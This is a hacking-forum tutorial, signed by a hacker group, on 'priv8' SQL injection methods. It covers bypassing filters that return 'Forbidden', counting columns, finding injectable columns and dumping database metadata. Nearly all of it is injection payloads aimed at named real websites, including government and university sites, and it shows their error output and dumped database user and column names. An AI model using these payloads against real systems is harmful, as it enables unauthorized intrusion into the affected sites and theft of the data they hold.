Priv8 Method Has Been Detected

•◘╚╦☆ Priv8 Method Has Been Detected ☆╚╦◘• . Hi EveryBody Tody I Will Learn You many Priv8 Method >>> Hope You loved And Learning Something New . What is the priv8 in SQLi ...

•◘╚╦☆ Priv8 Method Has Been Detected ☆╚╦◘•
.
Hi EveryBody Tody I Will Learn You many Priv8 Method >>> Hope You loved And Learning Something New
.
What is the priv8 in SQLi
.
the priv8 in SQL injection is the method that you using to bypassing sql error or Hard problem and that method no one know about it except you or just 5 people in the all word
.
█║▌│█│║▌║││█║▌│║█║▌▌▌
© BlackRose Hacker |
.
here mybe you know some method I adding in this post but in the same time I adding method that you first time to see let's see if this true or not
.
Let's Start
▂ ▃ ▄ ▅ ▆ ▇ █ what you will see here █ ▇ ▆ ▅ ▄ ▃ ▂
1- How to know if the site Vuln or not
2- How to get column number
3- How get the Vuln column

▂ ▃ ▄ ▅ ▆ ▇ █ 1- # how to know if the site Vuln or not # █ ▇ ▆ ▅ ▄ ▃ ▂
you can get sql error by using
id=1' [single quote]
id=1" [double quote]
id=1x [letter]
id=1 and 1=1
id=1 and 1=2
id=1+and+1%3D1
id=1+and+1%3D2
but !
sometime when you try to know if the site Vuln or not by using comma ' you get Forbidden like here
mahrukat.gov.sy/answercomplaints.php?id=12'

as you see there Forbidden with comma and to bypass that do what I say to you here :
.
1- first way : by adding letter-character after comma like id=12'a
mahrukat.gov.sy/answercomplaints.php?id=12'a
Done and get the error
.
Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'a'' at line 1
2- second way : by delet valiable number and add slash \
mahrukat.gov.sy/answercomplaints.php?id=\
Done and get the error
.
Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'a'' at line 1
▂ ▃ ▄ ▅ ▆ ▇ █ 2- # how to know column number and get the Vuln column # █ ▇ ▆ ▅ ▄ ▃ ▂
first we can get column number by using many method like
order by 100-- -
or
group by 100-- -
but some time we get >>>>
1- Forbidden by using order by 100 -- -
2- rediract by using order by 100 -- -
3- not work with all method that we have like order by 100 -- - or order by 100 asc -- -
4- not work ever with order by or group by
.
1- first for Forbidden with order by, we can use asc or desc after order by
.
http://www.princeofpoets.com/ar/news.php?cat=43' order by 100 -- -&id=230
we get Forbidden with order by, and the solution will be
http://www.princeofpoets.com/ar/news.php?cat=43' order by 100 asc -- -&id=230
work good
2- second for rediract with order by we can using this query to get column N
%20GROUP%20BY%20100%20asc%23
like here
bakutech.net/index.php?route=product/category&path=62 order by 100-- -
rediract to another page
www.sfendocrino.org/article.php…
work good >>> Unknown column '100' in 'group statement'
or using union select to know column number like this
union select 1--
union select 1,2--
union select 1,2,3--
union select 1,2,3,4-- etc
like this site
http://elib.unikom.ac.id/download.php?id=239425 order by 100 -- -
not work rediract to another page
so by using union select with column on by one the column number is 4
http://elib.unikom.ac.id/download.php…
3- third if not work with all method that we have like order by 1 asc -- - we will using ,'a'-- - like
www.arceducation.ac/newsdetails.php?newsId=5' order by 1 asc -- -
not work ERROR :: DBRESULT : Query Failed
www.arceducation.ac/newsdetails.php?newsId=5' order by 1,'a'-- -
work good the page loading
.
4- Fourthly if not work ever with order by or group by
# here some method we can use #
1- first Retrieving Columns By Using PROCEDURE ANALYSE()
It is necessary for the web app to display the one of the selected columns in the SQL query you are injecting to Given the query SELECT username, permission FROM Users WHERE id = 1;
id=1 PROCEDURE ANALYSE() Get the first column's name
.
id=1 LIMIT 1,1 PROCEDURE ANALYSE() Get the second column's name
.
id=1 LIMIT 2,1 PROCEDURE ANALYSE() Get the third column's name
like
http://testphp.vulnweb.com/listproducts.php?cat=1 LIMIT 10,1 PROCEDURE ANALYSE()
the page loading good ^__^
http://testphp.vulnweb.com/listproducts.php?cat=1 LIMIT 10,1 PROCEDURE ANALYSE()
the page not loading good so the column number is 11 column
.
2- second method by using Zero Method
here in this site the order by and group by and all method not work ever
https://galerie.univ-mosta.dz/luna.php?start=1 order by 1-- -
so I will use Zero Method to get column N >>> ,0;--+;%00
How it work ?
id=1,0;--+;%00 Play Here With Zero Number >>> 0;--+;%00
try with the hard site
https://galerie.univ-mosta.dz/luna.php?start=1,0;--+;
Nothing appeared empty page
https://galerie.univ-mosta.dz/luna.php?start=1,1;--+;
One picture appeared
https://galerie.univ-mosta.dz/luna.php?start=1,2;--+;
2 Pictures appeared
https://galerie.univ-mosta.dz/luna.php?start=1,9;--+;
9 Pictures appeared
https://galerie.univ-mosta.dz/luna.php?start=1,10;--+;
there wrong in the page so the column number is 9 columns
#
#
#
#
.
▂ ▃ ▄ ▅ ▆ ▇ █ 3- how get the Vuln column # █ ▇ ▆ ▅ ▄ ▃ ▂
# last method I will learnd to you >>>
some time when we know column number we can't appear Vuln column in the page so to do that! we will using this method
1- by using Brute Forcing Columns.
2- by Search in Sorce.
3- by nulling all column one by one.
4- by make all columns true one by one.
5- by adding 0x3023 to all columns one by one that's is there multiple querie
1- by using Brute Forcing Columns like
news.php?id=.58'and 0 union select 1111 -- -
news.php?id=.58'and 0 union select 11111,2222-- -
news.php?id=.58'and 0 union select 11111,2222,3333-- -
news.php?id=.58'and 0 union select 11111,2222,3333,4444-- -
like
interiorsdecor.in/pages.php…
2- by Search in Sorce like
to try to appear the column number here we will adding five that's same with our column like
id=1 union select 1,2,3-- -
id=1 union select 11111,22222,33333-- -
here in this site we can't see Vuln column
http://branthwaitecottages.co.uk/Gallery.php… and 0 union select 1,2,3,4,5,6,7,8,9,10;%00
so we will Searching in sorce
http://branthwaitecottages.co.uk/Gallery.php… and 0 union select 11111,22222,33333,44444,55555,66666,77777,88888,99999,1010101010;%00
after we open sourc we try to find column by click Shift+F and Writing 11111 or 22222 or 77777 etc
in line 178 I see that <td><a href="images/77777" title=
so the column Vuln is number 7
branthwaitecottages.co.uk/Gallery.php… and 0 union select 1,2,3,4,5,6,concat(0x223e, concat( 0x3c62723e, version(), 0x203a3a20426c61636b526f7365,0x3c62723e64617461626173653a20,DataBasE(),0x3c62723e757365723a20,UsEr(), concat(@c:=0x00,if((select count(*) from information_schema.columns where table_schema=database() and @c:=concat(@c,0x3c6c693e,table_name,0x2e,column_name)),0x00,0x00),@c)),0x3c696d67207372633d22),8,9,10;%00
.
5.6.17 :: BlackRose
database: branthwaite
user: root@localhost
contact.id
contact.firstname
contact.lastname
contact.email
contact.tel
.
3- by nulling all column one by one
id=.58'limit 1,1 union select null,2,3-- -
id=.58'limit 1,1 union select 1,null,3-- -
id=.58'limit 1,1 union select 1,2,null-- -
4- by make all columns true one by one
id=.58'limit 1,1 union select true,2,3-- -
id=.58'limit 1,1 union select 1,true,3-- -
id=.58'limit 1,1 union select 1,2,true-- -
5- by adding 0x3023 to all columns one by one that's is there multiple queries
id=.58'limit 1,1 union select 0x3023,2,3-- -
id=.58'limit 1,1 union select 1,0x3023,3-- -
id=.58'limit 1,1 union select 1,2,0x3023-- -
like
www.jfuinsurance.com/insurance/index.php?id=1137 and 0 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
Not working and error appear here
.
Error Code: 1064
Message: SQL: SELECT b.article_id, b.category_id, b.title, b.img_ext FROM engine2_articles b WHERE b.category_id=2 AND b.article_id != AND b.state=3 ORDER BY b.post_time
Error Msg: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND b.state=3 ORDER BY b.post_time' at line 1
www.jfuinsurance.com/insurance/index.php?id=1137 and 0 UNION SELECT 0x3023,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
Not working Error Code: 1064
www.jfuinsurance.com/insurance/index.php?id=1137 and 0 UNION SELECT 1,0x3023,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
work good ^__^
we can insert every id like 0x3023 or 0x3123 etc 23 means comment , Value from column 2 is used in multiple queries, So I left 2 as column value and added -- - to comment out other queries, This way original error (because of multiple queries) is gon
that's all to learn you about priv8 method
please share in this question from all that see my tut
•◘╚╦☆ A question ☆╚╦◘•
are you learnd something new today from this tut and you for the first time you know about ?
Regards
.
█║▌│█│║▌║││█║▌│║█║▌▌▌
© BlackRose Hacker |
Gaza Hacker Team
 
131,839Konular
3,271,894Mesajlar
316,353Kullanıcılar
KenanfgxSon Üye
Üst Alt